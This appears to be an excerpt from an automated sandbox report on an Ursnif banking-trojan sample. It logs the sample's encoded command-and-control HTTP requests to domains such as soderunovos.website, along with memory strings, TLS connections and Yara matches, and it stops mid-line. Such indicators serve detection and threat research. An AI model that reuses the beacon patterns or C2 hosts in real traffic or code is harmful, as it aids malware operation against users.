                      Source: global trafficHTTP traffic detected: GET /jdraw/f6g_2FiF4/BVB_2BmxiIV1nw_2B4cK/CEW08ItbFLwHO8UQuXN/_2BLf2lFUFBrC4suobQbOB/0fGYw2vRMdeDd/GloxsNvw/PasUyB_2F_2BHKhCo7UgE3u/2gjzOvnViA/3VWPE0psH7LTVPa7Y/AQrrT0oMv35d/Jg57ryhE8om/OJw5Ee8c4mGK6J/l0QzZoUYoPnAbKMV1LRii/_2FzkrD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/F_2Fam6oH9/d5VYFYpsfuCm2K1vb/FQEZJonXTERW/XCyivBuN7WP/pkkBh6P8bwS7JA/_2BGKoxOOY8NFu9I7k4lJ/PQBFMF7GdwoWQQpH/fx_2BleSZS1DDTO/Af_2FwYYreElF2LILk/I1df5_2Fd/zVYWpMKEIfwVAwGc0tI5/Te_2FDbyN2KV7bbG5lt/D80197YRF38WxHFk/uqB4Yp.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/_2BRLy1x/4wsN2dLN7SbtqKweyBCVQVy/ncNEkpC68M/pGX_2BOwGt0R9_2BF/gPvtyZ2zCuXU/MtW7n3eg_2B/cVfCNS_2BVDqYE/NcD6s_2FvRGdMXsqfE9ud/QnKqi6Gdk85wdC67/aXmIXPep1RKvSuC/dU0LoB35OeBogincV5/_2FxALfnm/Pttx7XLPfUVU3_2FKsJC/yP8zqBt1Q2czLtOvx6I/xwix1VQVzSylmtN4_2FaYq/KZRSXLzBBanwh/lTfsORlu/JAGztGerO6_2BOMh0JL/2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2F_2BRLy1x%2F4wsN2dLN7SbtqKweyBCVQVy%2FncNEkpC68M%2FpGX_2BOwGt0R9_2BF%2FgPvtyZ2zCuXU%2FMtW7n3eg_2B%2FcVfCNS_2BVDqYE%2FNcD6s_2FvRGdMXsqfE9ud%2FQnKqi6Gdk85wdC67%2FaXmIXPep1RKvSuC%2FdU0LoB35OeBogincV5%2F_2FxALfnm%2FPttx7XLPfUVU3_2FKsJC%2FyP8zqBt1Q2czLtOvx6I%2Fxwix1VQVzSylmtN4_2FaYq%2FKZRSXLzBBanwh%2FlTfsORlu%2FJAGztGerO6_2BOMh0JL%2F2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewIP Address: 87.248.118.23 87.248.118.23
                      Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000D.00000002.878324773.0000016899EF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=4np
                      Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://qoderunovos.website
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://soderunovos.website
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://soderunovos.websitehttps://qoderunovos.website
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2H
                      Source: unknownDNS traffic detected: queries for: yahoo.com
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeCode function: 1_2_03C55988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,1_2_03C55988
                      Source: global trafficHTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0m9msshgpqh4o&b=3&s=91
                      Source: global trafficHTTP traffic detected: GET /jdraw/izNkSVzKAcmqBRr6xyW/6eSNtrmUMl5kl7H7bHpPPe/XgZq30OCLmJbN/38meyqW9/jS3Kn1JZp4TlGq5YgXpUl9C/Xa1SOjVmRG/sfAXrifyx5RMMj1rG/x2_2B6xVjnCu/FR4yio2EmeZ/DM6_2BUk4qTqT1/rz8mXurCnwQiTqH0u8uPF/_2Bjp7nf0rXmnB1i/Em2dqw_2Bys5D/8.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/f6g_2FiF4/BVB_2BmxiIV1nw_2B4cK/CEW08ItbFLwHO8UQuXN/_2BLf2lFUFBrC4suobQbOB/0fGYw2vRMdeDd/GloxsNvw/PasUyB_2F_2BHKhCo7UgE3u/2gjzOvnViA/3VWPE0psH7LTVPa7Y/AQrrT0oMv35d/Jg57ryhE8om/OJw5Ee8c4mGK6J/l0QzZoUYoPnAbKMV1LRii/_2FzkrD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/F_2Fam6oH9/d5VYFYpsfuCm2K1vb/FQEZJonXTERW/XCyivBuN7WP/pkkBh6P8bwS7JA/_2BGKoxOOY8NFu9I7k4lJ/PQBFMF7GdwoWQQpH/fx_2BleSZS1DDTO/Af_2FwYYreElF2LILk/I1df5_2Fd/zVYWpMKEIfwVAwGc0tI5/Te_2FDbyN2KV7bbG5lt/D80197YRF38WxHFk/uqB4Yp.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/_2BRLy1x/4wsN2dLN7SbtqKweyBCVQVy/ncNEkpC68M/pGX_2BOwGt0R9_2BF/gPvtyZ2zCuXU/MtW7n3eg_2B/cVfCNS_2BVDqYE/NcD6s_2FvRGdMXsqfE9ud/QnKqi6Gdk85wdC67/aXmIXPep1RKvSuC/dU0LoB35OeBogincV5/_2FxALfnm/Pttx7XLPfUVU3_2FKsJC/yP8zqBt1Q2czLtOvx6I/xwix1VQVzSylmtN4_2FaYq/KZRSXLzBBanwh/lTfsORlu/JAGztGerO6_2BOMh0JL/2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2F_2BRLy1x%2F4wsN2dLN7SbtqKweyBCVQVy%2FncNEkpC68M%2FpGX_2BOwGt0R9_2BF%2FgPvtyZ2zCuXU%2FMtW7n3eg_2B%2FcVfCNS_2BVDqYE%2FNcD6s_2FvRGdMXsqfE9ud%2FQnKqi6Gdk85wdC67%2FaXmIXPep1RKvSuC%2FdU0LoB35OeBogincV5%2F_2FxALfnm%2FPttx7XLPfUVU3_2FKsJC%2FyP8zqBt1Q2czLtOvx6I%2Fxwix1VQVzSylmtN4_2FaYq%2FKZRSXLzBBanwh%2FlTfsORlu%2FJAGztGerO6_2BOMh0JL%2F2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:44:24 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 9server: ATSContent-Length: 1084Age: 0Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=4npkagdgpqh4o&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 19:47:06 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2Hc%2fBze1TT57OG4HBNl2UO4H2_2%2fF2x5eVeu_2%2fF0oEIMCthzpdl_2F0%2fg6yK5x4lAPBL%2fIfJhlJxCH88%2fkNEvL4B2xwbPkg%2fl6LFIMkoo7_2BSx2Zl9QD%2fsNqAlyxot9VgUnIt%2ftD2_2FQ67j1kKZ4%2f4sQxxRyc1y_2Bi_2BR%2fgsw9z5z81%2fv3w096aztXCXUnfe5Q%2fwc2.crw'"></noscript> equals www.yahoo.com (Yahoo)
                      Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmpString found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2Hc%2fBze1TT57OG4HBNl2UO4H2_2%2fF2x5eVeu_2%2fF0oEIMCthzpdl_2F0%2fg6yK5x4lAPBL%2fIfJhlJxCH88%2fkNEvL4B2xwbPkg%2fl6LFIMkoo7_2BSx2Zl9QD%2fsNqAlyxot9VgUnIt%2ftD2_2FQ67j1kKZ4%2f4sQxxRyc1y_2Bi_2BR%2fgsw9z5z81%2fv3w096aztXCXUnfe5Q%2fwc2.crw'; equals www.yahoo.com (Yahoo)
                      Source: anIV2qJeLD.exe, 00000001.00000002.969768372.00000000050DA000.00000004.00000010.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: unknownHTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.4:49781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49854 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.4:49858 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match<